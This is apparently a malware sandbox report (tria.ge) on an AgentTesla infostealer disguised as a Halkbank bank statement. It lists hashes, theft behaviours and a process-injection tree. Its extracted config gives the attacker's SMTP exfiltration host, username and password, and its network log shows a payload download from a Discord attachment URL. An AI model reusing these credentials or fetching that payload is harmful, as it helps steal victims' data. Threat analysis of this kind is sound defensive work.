Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23/09/2024, 10:50 UTC

General

  • Target

    Halkbank_Ekstre_20240922_080921_689429.exe

  • Size

    110KB

  • MD5

    c8cea26640b2fa181571afd43c2e4477

  • SHA1

    5b9e511450b327634fcc620814ebf42cb57b0c91

  • SHA256

    261f4e785355cfd784f655fe0fc4a67be3cc18bb09e742b0187cfcc284fa5240

  • SHA512

    20d9aca79e7034fdd1dbd2b785af17f973c0b9a2ab38dd40338dc0217754d2ea1fd6f00ad9d60bf761dc9d8c135acf32ebd9064facc3e0f3dc9790c3cbd00212

  • SSDEEP

    1536:Y48kc/9ORkoOQzhSppeT//142G1Fq9uelIA630VDx:8kE9OuDp21DiqAEVDx

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.zqamcx.com
  • Port:
    587
  • Username:
    server1@zqamcx.com
  • Password:
    Anambraeast@
  • Email To:
    server@zqamcx.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe
    "C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2820

Network

  • flag-us
    DNS
    cdn.discordapp.com
    Halkbank_Ekstre_20240922_080921_689429.exe
    Remote address:
    8.8.8.8:53
    Request
    cdn.discordapp.com
    IN A
    Response
    cdn.discordapp.com
    IN A
    162.159.130.233
    cdn.discordapp.com
    IN A
    162.159.134.233
    cdn.discordapp.com
    IN A
    162.159.135.233
    cdn.discordapp.com
    IN A
    162.159.129.233
    cdn.discordapp.com
    IN A
    162.159.133.233
  • flag-us
    GET
    https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&
    Halkbank_Ekstre_20240922_080921_689429.exe
    Remote address:
    162.159.130.233:443
    Request
    GET /attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a& HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 23 Sep 2024 10:50:55 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 327008
    Connection: keep-alive
    CF-Ray: 8c79f9fd4df894d5-LHR
    CF-Cache-Status: HIT
    Accept-Ranges: bytes, bytes
    Age: 10252
    Cache-Control: public, max-age=31536000
    Content-Disposition: attachment; filename="kingggggme.txt"
    ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
    Expires: Tue, 23 Sep 2025 10:50:54 GMT
    Last-Modified: Mon, 23 Sep 2024 07:59:58 GMT
    Vary: Accept-Encoding
    x-goog-generation: 1727078398052007
    x-goog-hash: crc32c=F3gHFg==
    x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
    x-goog-metageneration: 1
    x-goog-storage-class: STANDARD
    x-goog-stored-content-encoding: identity
    x-goog-stored-content-length: 327008
    x-guploader-uploadid: AD-8ljuSgJeARyAKoFDsjKGCmnOLdW0aNJZzRI-XUBfMXltfgMk3zNRc58-0aFwDSDQQW9Hc4x64KlpuOQ
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Set-Cookie: __cf_bm=to9.io70Fy4VtcH4UvjpQtnTyfh9rG6nxLQE2CRgc9w-1727088655-1.0.1.1-HlUnKbYSOLV2yBU.Ivc9hM5SuhmGaC76lj6EQYe7Z98TOkq6kbsP4bUtrVWQ4Ljo8pqfyj_IvCfyEatZRVG64w; path=/; expires=Mon, 23-Sep-24 11:20:55 GMT; domain=.discordapp.com; HttpOnly; Secure
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3aCTlT8sIlx9yymfrEDvhfvvsHqquguEzyXSEvoyo6GWIhXiykyvTSXrPyIricZZPt9ea7YEuZFHEUOD7vh0f2LiWotl3WTtjAPEA36Mw6YjgrAz8UvDnmA%2F9%2Buqxnq23YMIA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: _cfuvid=ZhBkIjWaxLEc95dtVyBMyvTl34Sx5QP1.eJC3t_dJ.4-1727088655050-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
  • flag-us
    DNS
    ip-api.com
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    RegAsm.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 23 Sep 2024 10:50:56 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • 162.159.130.233:443
    https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&
    tls, http
    Halkbank_Ekstre_20240922_080921_689429.exe
    7.4kB
    344.6kB
    150
    261

    HTTP Request

    GET https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    RegAsm.exe
    356 B
    347 B
    6
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 8.8.8.8:53
    cdn.discordapp.com
    dns
    Halkbank_Ekstre_20240922_080921_689429.exe
    64 B
    144 B
    1
    1

    DNS Request

    cdn.discordapp.com

    DNS Response

    162.159.130.233
    162.159.134.233
    162.159.135.233
    162.159.129.233
    162.159.133.233

  • 8.8.8.8:53
    ip-api.com
    dns
    RegAsm.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2068-0-0x0000000074BDE000-0x0000000074BDF000-memory.dmp

    Filesize

    4KB

  • memory/2068-1-0x0000000000960000-0x0000000000984000-memory.dmp

    Filesize

    144KB

  • memory/2068-2-0x0000000074BD0000-0x00000000752BE000-memory.dmp

    Filesize

    6.9MB

  • memory/2068-14-0x0000000074BD0000-0x00000000752BE000-memory.dmp

    Filesize

    6.9MB

  • memory/2820-9-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2820-13-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2820-11-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2820-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2820-6-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2820-5-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2820-4-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2820-3-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.